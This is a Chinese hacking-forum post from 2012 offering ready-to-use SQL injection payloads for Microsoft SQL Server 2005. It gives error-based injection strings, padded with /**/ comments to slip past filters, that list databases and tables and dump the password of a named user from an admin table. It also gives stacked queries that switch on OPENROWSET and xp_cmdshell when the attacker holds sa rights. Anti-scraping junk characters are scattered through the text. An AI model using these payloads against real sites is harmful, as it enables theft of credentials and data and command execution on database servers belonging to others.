找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2171|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, U+ z5 S: n3 C, o5 Q- v& ]3 F# J$ ?+ M; h' m. Q6 }7 U

7 f0 O' E: F# p7 S5 R; P[Copy to clipboard]CODE:
; o. e. ?7 @, x; V/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--( |! {$ O& @* u5 P( ?/ P8 p* S

) f* Z* h" w# E- f( t9 M3 k4 m爆表语句,somedb部份是所要列的数据库,红色数字1累加4 O/ W( F0 r. F
, ]( ?4 W5 T5 B; K

" Z& @4 Q* A8 H) d" K# L* ^5 p[Copy to clipboard]CODE:  H5 Q( W, d; u7 t/ O+ T
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--% Y8 K# C; W( v* t* ^* N
' F. E1 F0 y' F/ d) G- p. p
爆字段语句,爆表admin里user='icerover'的密码段2 S9 O- B1 [1 W

! y0 h4 b8 {/ o1 }- q" w# s) R- n; b  T3 u! E( X: Q
[Copy to clipboard]CODE:, w- N7 P( x. N2 x% p
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--& G! j; x+ C, v3 g
! u3 P; _& V, ~
mssql2005默认没有开xp_cmdshell的,openrowset也不能用8 J& C8 {1 P* i9 G
如果是sa权限,可以这样来开启
" O7 i; O( b3 ]' J7 @2 `开启openrowset
& Q( ?# S8 Z7 U4 Z+ q! M  K+ U" O' [6 u# @% ~9 D( ?  R

) T7 B/ }  ~' ~: L, w* s[Copy to clipboard]CODE:
* z( y9 q9 G. z( a/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
( K  z) ^7 e: n4 [) y; r7 F/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
9 Y- ~+ p$ ]3 R; o( P( j( y. L/ i8 q) |
, Z" H' G, m- h1 W6 ]% L! h5 m开启xp_cmdshell3 C% |  P4 A, @) u8 C1 g
8 ~1 A0 Y( U3 @/ b# [
+ g. B# y0 K' m7 A, @
[Copy to clipboard]CODE:& ]6 H, N/ O* \
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--: N/ Y. e: T; y& X" d
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
4 D" N; d5 t# {3 z5 s. F
4 c7 V4 K0 U) ^7 l2 Jok,over~~晚安0 U" S  j% Z4 _8 m! @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表